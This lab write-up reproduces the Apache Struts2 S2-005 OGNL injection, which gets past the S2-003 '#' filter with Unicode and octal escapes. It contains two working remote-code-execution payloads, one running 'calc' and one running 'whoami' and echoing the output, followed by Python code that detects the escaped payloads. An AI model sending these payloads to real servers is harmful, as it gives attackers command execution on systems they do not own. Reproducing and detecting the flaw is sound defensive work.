# Reproducing S2-005

#### Principle

The fix for S2-003 can be bypassed: the S2-003 filter blocks `#` but ignores its Unicode escape, so `\u0023` or an octal escape (`\43`) can be used in its place to get past the filter.
#### Environment setup

```shell
docker-compose up -d
```
#### Vulnerability verification

Original POC

```
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true
&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnew java.lang.Boolean("false")))
&(asdf)(('\u0023rt.exec("calc")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
```
After decoding

```
('#_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true
// set allowStaticMethodAccess to true; once it is enabled, static methods can be called
// (vaaa) is only there to satisfy OGNL's syntax-tree rules
&(aaaa)(('#context[\'xwork.MethodAccessor.denyMethodExecution\']=#vccc')(#vccc=new java.lang.Boolean("false")))
// set denyMethodExecution to false, allowing custom OGNL variables
&(asdf)(('#rt.exec("calc")')(#rt=@java.lang.Runtime@getRuntime()))=1
// run the system command calc
```
whoami POC

```
(%27%5c43_memberAccess.allowStaticMethodAccess%27)(a)=true
&(b)((%27%5c43context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5c75false%27)(b))
&(%27%5c43c%27)((%27%5c43_memberAccess.excludeProperties%5c75@java.util.Collections@EMPTY_SET%27)(c))
&(g)((%27%5c43mycmd%5c75%5c%27whoami%5c%27%27)(d))
&(h)((%27%5c43myret%5c75@java.lang.Runtime@getRuntime().exec(%5c43mycmd)%27)(d))&(i)((%27%5c43mydat%5c75new%5c40java.io.DataInputStream(%5c43myret.getInputStream())%27)(d))&(j)((%27%5c43myres%5c75new%5c40byte[51020]%27)(d))&(k)((%27%5c43mydat.readFully(%5c43myres)%27)(d))&(l)((%27%5c43mystr%5c75new%5c40java.lang.String(%5c43myres)%27)(d))&(m)((%27%5c43myout%5c75@org.apache.struts2.ServletActionContext@getResponse()%27)(d))&(n)((%27%5c43myout.getWriter().println(%5c43mystr)%27)(d))
```
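As an added defender-side example (not from the original post or the Struts project), the following Python normaliser resolves the URL encoding plus the `\uXXXX` and octal escapes that both payloads above rely on before checking for `#`, which is exactly the step the S2-003 filter skipped. The sample query strings are constructed, and `normalize_ognl`, `naive_filter_blocks`, `hardened_filter_blocks` and `find_indicators` are this example's own names.

```python
import re
from urllib.parse import unquote

# Indicators taken from the payloads above, compared after normalisation and lower-casing.
INDICATORS = ("#_memberaccess", "#context[", "denymethodexecution", "@java.lang.runtime@")

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")   # \u0023 -> '#', \u003d -> '='
_OCTAL_ESC = re.compile(r"\\([0-7]{1,3})")          # \43 -> '#', \75 -> '=', \40 -> ' '


def normalize_ognl(raw: str) -> str:
    """URL-decode a query string, then resolve the Java/OGNL string escapes
    (\\uXXXX and up to three octal digits) that S2-005 uses to hide '#' and '='."""
    text = unquote(raw)
    text = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = _OCTAL_ESC.sub(lambda m: chr(int(m.group(1), 8)), text)
    return text


def naive_filter_blocks(raw: str) -> bool:
    """Simplified model of the S2-003-style check: it looks for a literal '#'
    after URL decoding only, so the escaped forms slip through."""
    return "#" in unquote(raw)


def hardened_filter_blocks(raw: str) -> bool:
    """The same check applied to the fully normalised string."""
    return "#" in normalize_ognl(raw)


def find_indicators(raw: str) -> list:
    """Return the S2-005 indicators present in a request's query string."""
    norm = normalize_ognl(raw).lower()
    return [ind for ind in INDICATORS if ind in norm]


# Constructed sample query strings: one benign request, and the opening parameter
# of each payload shown above (Unicode-escaped and octal-escaped respectively).
SAMPLES = {
    "benign": "name=alice&page=2",
    "unicode": "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(vaaa)=true",
    "octal": "(%27%5c43_memberAccess.allowStaticMethodAccess%27)(a)=true",
}

if __name__ == "__main__":
    for label, query in SAMPLES.items():
        print(f"{label:8} naive={naive_filter_blocks(query)!s:5} "
              f"hardened={hardened_filter_blocks(query)!s:5} hits={find_indicators(query)}")
```

Run against real traffic, the naive check returns False for both escaped samples while the hardened check returns True, which is the gap a WAF rule or log search for S2-005 has to close.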
#### Tearing down the environment

```shell
docker-compose down -v
```